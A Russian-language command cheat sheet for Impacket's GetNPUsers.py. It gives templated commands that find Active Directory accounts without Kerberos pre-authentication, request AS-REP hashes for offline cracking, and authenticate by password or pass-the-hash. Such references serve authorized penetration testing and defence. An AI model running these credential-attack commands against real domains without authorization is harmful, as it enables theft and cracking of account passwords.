# GetNPUsers.py

> Получать список учётных записей Active Directory с отключённой предварительной аутентификацией Kerberos, которые могут быть уязвимы для атак AS-REP roasting.
> Часть набора инструментов Impacket.
> Больше информации: <https://github.com/fortra/impacket>.

- Вывести список пользователей с отключённой предварительной аутентификацией Kerberos (анонимный перебор по умолчанию):

`GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -no-pass`

- Выполнить атаку AS-REP roasting и извлечь хеши для офлайн-взлома:

`GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -no-pass -request`

- Аутентифицироваться с действительными учётными данными (если анонимная привязка отключена):

`GetNPUsers.py {{домен}}/{{имя_пользователя}}:{{пароль}} -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}}`

- Использовать аутентификацию pass-the-hash вместо пароля:

`GetNPUsers.py {{домен}}/{{имя_пользователя}} -hashes {{LM_хеш}}:{{NT_хеш}} -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}}`

- Сохранить результаты в файл для дальнейшего анализа:

`GetNPUsers.py {{домен}}/ -usersfile {{путь/к/списку_пользователей}} -dc-ip {{ip_контроллера_домена}} -request > {{путь/к/выходному_файлу.txt}}`